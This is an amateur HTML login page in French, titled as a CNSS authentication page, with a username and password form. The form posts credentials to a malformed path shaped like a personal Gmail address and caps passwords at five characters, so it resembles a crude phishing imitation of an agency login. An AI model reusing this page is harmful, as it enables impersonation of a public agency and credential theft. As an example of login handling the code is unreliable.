<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>CNSS.authentification</title>
        <link rel="stylesheet" type="text/css" href="/style.css">
</head>
<body>
    
        <div class="nav"></div> 
        <div class="na"><h1>Authentification</h1></div>

    <div id = "mag" class="image" role="" data-stellar-background-ratio="0.5"><img src="corso.jpg" alt=" " width=100% height="400"></div>
    <div class="nas"></div>
    <footer id="fh5co-footer" class="fh5co-bg" style="background-image: url(/img_bg_1.jpg);" role="contentinfo">
		
		<div class="container">
			<div class="row row-pb-md">
				
			</div>

		</div>
	</footer>
    <div id ="bas" class="bas"role="" data-stellar-background-ratio="0.5"><img src="img_bg_1.jpg" alt=" " width=100% height="100">
    
    </div>
      
        <div class="loginbox">
                <form method="POST" action="/www.hervekongo.hk@gmail.com">
                    <p>Username</p>
                         <input type="text" name="user" placeholder="Entrer votre nom">
                            <span class="error"></span>
                               <p>Password</p>
                                 <input type="password" maxlength="5" name="key" placeholder="Entrer votre mot de passe"><br><br>
                                   <span class="error"></span>
                                     <input type="Submit" maxlength="5" name="" value="Connexion"><br>
                                         <a href="#">lost your password</a><br>
                                             <a href="#">Don't have an account?</a>
                </form>
        </div>
   
</body>
</html>